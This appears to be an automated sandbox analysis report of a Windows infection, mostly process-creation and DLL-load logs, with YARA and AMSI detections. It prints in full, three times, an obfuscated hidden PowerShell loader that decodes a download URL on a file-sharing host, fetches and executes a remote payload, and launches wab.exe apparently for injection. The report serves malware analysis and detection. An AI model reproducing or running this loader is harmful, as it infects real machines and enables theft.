Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda 
IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntvdm64.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: .Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb4 source: powershell.exe, 00000005.00000002.2263492849.0000000006FB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2263492849.000000000700D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbS source: powershell.exe, 00000005.00000002.2267497983.0000000007E7B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000005.00000002.2273423289.0000000009D8D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2268505302.00000000082A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2261205376.0000000005897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2600669071.000001CB2C082000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Craniographer238)$global:Subgiant = [System.Text.Encoding]::ASCII.GetString($Eksploderings)$global:Mored162=$Subgiant.substring($Surmounting,$Spejle)<#Skinflintily Ergatomorphism Und
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tillukkede $Autoklaveringer $Andelskasse), (obliquely @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Aktieavancebeskatnings = [AppDomain]::CurrentDomain.G
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dsedes90)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Revisionsprotokollers, $false).DefineType($Popul
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Craniographer238)$global:Subgiant = [System.Text.Encoding]::ASCII.GetString($Eksploderings)$global:Mored162=$Subgiant.substring($Surmounting,$Spejle)<#Skinflintily Ergatomorphism Und
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini 
,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda 
IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove
